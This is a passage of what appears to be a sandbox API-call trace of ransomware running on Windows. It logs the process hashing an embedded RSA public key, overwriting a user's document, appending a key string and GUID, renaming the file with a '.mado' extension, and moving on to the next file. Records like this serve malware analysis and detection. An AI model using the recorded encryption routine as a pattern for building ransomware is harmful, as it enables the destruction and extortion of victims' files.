KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.133] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.134] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.134] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.134] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.134] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.134] GetLastError () returned 0x0 [0204.134] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.134] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.134] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.134] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.134] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf570) returned 0x3b80690 [0204.135] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e5a0 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe058 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e5e8 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe070 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0a0 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.135] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe0b8 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe0a0 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.136] GetCurrentThreadId () returned 0x600 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b70dc0 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.137] GetCurrentThreadId () returned 0x600 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0e8 [0204.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0a0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0b8 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe088 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe100 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0d0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe118 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe0a0 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0e8 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe118 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0a0 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0d0 | out: hHeap=0x2c0000) returned 1 [0204.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe100 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe0b8 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe088 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe070 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e5e8 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3578 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.140] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0xf564, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0xf564, lpOverlapped=0x0) returned 1 [0204.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.140] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf569, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.141] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.141] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.141] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.141] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.141] CloseHandle (hObject=0x63c) returned 1 [0204.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0204.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0204.142] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sxid0Link-5zZ7dsKVQV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sxid0link-5zz7dskvqv.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Sxid0Link-5zZ7dsKVQV.docx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sxid0link-5zz7dskvqv.docx.mado")) returned 1 [0204.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.143] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.144] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e88d6f0, ftCreationTime.dwHighDateTime=0x1d5852b, ftLastAccessTime.dwLowDateTime=0xb59b3d20, ftLastAccessTime.dwHighDateTime=0x1d575c3, ftLastWriteTime.dwLowDateTime=0xb59b3d20, ftLastWriteTime.dwHighDateTime=0x1d575c3, nFileSizeHigh=0x0, nFileSizeLow=0x3d0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ulqu akyI-EFV4fSDQDc.pptx", cAlternateFileName="ULQUAK~1.PPT")) returned 1 [0204.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff260 | out: hHeap=0x2c0000) returned 1 [0204.144] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ulqu akyI-EFV4fSDQDc.pptx") returned=".pptx" [0204.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ulqu akyI-EFV4fSDQDc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ulqu akyi-efv4fsdqdc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.145] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=15630) returned 1 [0204.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.147] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3ce8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 